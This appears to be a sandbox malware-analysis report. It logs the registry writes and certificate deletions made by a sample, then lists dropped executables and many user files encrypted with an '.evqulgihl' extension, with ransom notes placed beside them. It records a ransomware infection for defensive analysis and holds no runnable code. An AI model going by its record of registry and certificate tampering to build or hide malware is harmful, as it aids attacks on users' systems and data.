4CA1F45ECCBB00B32EE3AE6632F853CEB06E33051813A5598CCC679D05EAEB49991246A273AE9B0C02E5F6328DA993A813CA8BC0B9606EC505F53A2A4C482EA71B1DCFB2467F77A9137B8A71D2873FE9F125AD9BD9EFA00245E1486BCA5BA0E68037A0AC80A95629FF84E1CC08DBC6AEC400
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
EnableFileTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
EnableConsoleTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
FileTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
ConsoleTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
MaxFileSize
1048576
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASAPI32
FileDirectory
%windir%\tracing
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
EnableFileTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
EnableConsoleTracing
0
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
FileTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
ConsoleTracingMask
4294901760
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
MaxFileSize
1048576
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3478239163_RASMANCS
FileDirectory
%windir%\tracing
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2452
3478239163.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006B000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2452
3478239163.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510
2452
3478239163.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
2452
3478239163.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Blob
040000000100000010000000C5DFB849CA051355EE2DBA1AC33EB0280F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB090000000100000054000000305206082B0601050507030106082B0601050507030206082B0601050507030306082B0601050507030406082B06010505070308060A2B0601040182370A030406082B0601050507030606082B060105050703070B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D0020005200330000005300000001000000230000003021301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B1400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA953030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F2000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F
2452
3478239163.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD

Files activity

Executable files
14
Suspicious files
273
Text files
212
Unknown types
14

Dropped files

PID Process Filename Type
3452 powershell.exe C:\Users\admin\AppData\Local\Temp\979574639568794.exe executable
2992 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2495831141.exe executable
3636 3580527067.exe C:\Users\admin\657607470096780\winsvcs.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3327529366.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3478239163.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exe executable
2992 winsvcs.exe C:\Users\admin\AppData\Local\Temp\4177133078.exe executable
3576 979574639568794.exe C:\Users\admin\495030305060\winsvcs.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\1469420263.exe executable
4092 3327529366.exe C:\Users\admin\4950606094303050\wincfg32svc.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2184730977.exe executable
2868 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3580527067.exe executable
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\idb\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.evqulgihl gpg
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg ––
2452 3478239163.exe C:\Users\Public\Pictures\Sample Pictures\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3.evqulgihl ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3 ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.pizcam[1].txt text
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3 ––
2452 3478239163.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3.evqulgihl ––
2452 3478239163.exe C:\Users\Public\Libraries\RecordedTV.library-ms.evqulgihl binary
2452 3478239163.exe C:\Users\Public\Music\Sample Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Libraries\RecordedTV.library-ms ––
2452 3478239163.exe C:\Users\Public\Libraries\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Videos\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Favorites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Downloads\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Documents\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\Public\Pictures\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms ––
2452 3478239163.exe C:\Users\admin\Pictures\newsdistance.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Pictures\sometimeswoman.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Saved Games\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms ––
2452 3478239163.exe C:\Users\admin\Pictures\sometimeswoman.png ––
2452 3478239163.exe C:\Users\admin\Pictures\newsdistance.jpg ––
2452 3478239163.exe C:\Users\admin\Pictures\drugnational.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Pictures\listingstexas.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\ntuser.ini.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Pictures\listingstexas.jpg ––
2452 3478239163.exe C:\Users\admin\Pictures\drugnational.png ––
2452 3478239163.exe C:\Users\admin\ntuser.ini ––
2452 3478239163.exe C:\Users\admin\Links\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.evqulgihl vc
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.evqulgihl bs
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Windows Live\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url ––
2452 3478239163.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.evqulgihl mp3
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url ––
2452 3478239163.exe C:\Users\admin\Favorites\Links\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Favorites\Links\Suggested Sites.url.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\Links\Suggested Sites.url ––
2452 3478239163.exe C:\Users\admin\Downloads\statementgolf.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\referenceport.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Favorites\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Downloads\referenceport.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\statementgolf.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\advertisemost.jpg.evqulgihl flc
2452 3478239163.exe C:\Users\admin\Downloads\michiganboys.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\namar.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\maccustomer.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\maccustomer.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\michiganboys.jpg ––
2452 3478239163.exe C:\Users\admin\Downloads\namar.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\shoppingsuch.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Downloads\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Downloads\advertisemost.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\shoppingsuch.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.evqulgihl pgc
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst ––
2452 3478239163.exe C:\Users\admin\Documents\Outlook Files\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\outdoorwine.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\outdoorwine.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2 ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one ––
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Videos\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\fuckingreserved.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\developingservice.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\OneNote Notebooks\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Pictures\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Music\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\fuckingreserved.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\developingservice.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\telthought.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\storeny.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Documents\bedmemory.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\resourceblog.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Documents\cartamount.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\storeny.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\resourceblog.rtf ––
2452 3478239163.exe C:\Users\admin\Documents\bedmemory.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\telthought.jpg ––
2452 3478239163.exe C:\Users\admin\Documents\cartamount.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\gradepaper.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\researchgot.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\opportunityreleases.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\previoushill.jpg.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\naturaleasily.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\researchgot.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\naturaleasily.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\previoushill.jpg ––
2452 3478239163.exe C:\Users\admin\Desktop\opportunityreleases.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\degreepurchase.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\filepain.rtf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Desktop\degreepurchase.png ––
2452 3478239163.exe C:\Users\admin\Desktop\gradepaper.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\filepain.rtf ––
2452 3478239163.exe C:\Users\admin\Desktop\bookget.png.evqulgihl binary
2452 3478239163.exe C:\Users\admin\Contacts\admin.contact.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Desktop\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Desktop\bookget.png ––
2452 3478239163.exe C:\Users\admin\Contacts\admin.contact ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\Java\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Sun\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\Contacts\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@belvedere-locarno[1].txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\shared.xml ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\logs\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data ––
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\DataRv\EVQULGIHL-DECRYPT.txt text
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.evqulgihl binary
2452 3478239163.exe C:\Users\admin\AppData\Roaming\Skype\EVQULGIHL-DECRYPT.txt text
